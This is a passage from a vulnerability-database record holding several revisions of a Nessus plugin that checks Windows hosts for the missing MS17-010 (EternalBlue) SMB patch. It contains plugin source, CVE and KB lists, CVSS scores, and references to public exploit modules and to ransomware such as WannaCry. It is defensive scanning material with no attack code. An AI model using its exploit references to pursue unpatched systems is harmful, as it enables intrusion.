script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2017/06/28 17:30:01 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": [], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2017-06-29T03:49:19", "differentElements": ["cpe", "modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "a0884af3451344e7b40c0675e284c8c9e0aa09dd32ca9d5889fcf89868f7ad89", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2018-03-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-03-03T18:23:44", "history": [], "viewCount": 1843, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"$Revision: 1.20 $\");\n script_cvs_date(\"$Date: 2018/03/01 14:52:30 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-03-03T18:23:44", "differentElements": ["modified", "references", "sourceData"], "edition": 2}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "5257706fbc80006c6a62e2f5d670ecd2a2165ef160851ffb3965d654f0d7e5cb", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-02-21T01:29:44", "history": [], "viewCount": 2557, "enchantments": {"dependencies": {"modified": "2019-02-21T01:29:44", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KB4012215", "KB4012606", "KB4013389", "KB4012598", "KB4013198"], "type": "mskb"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": 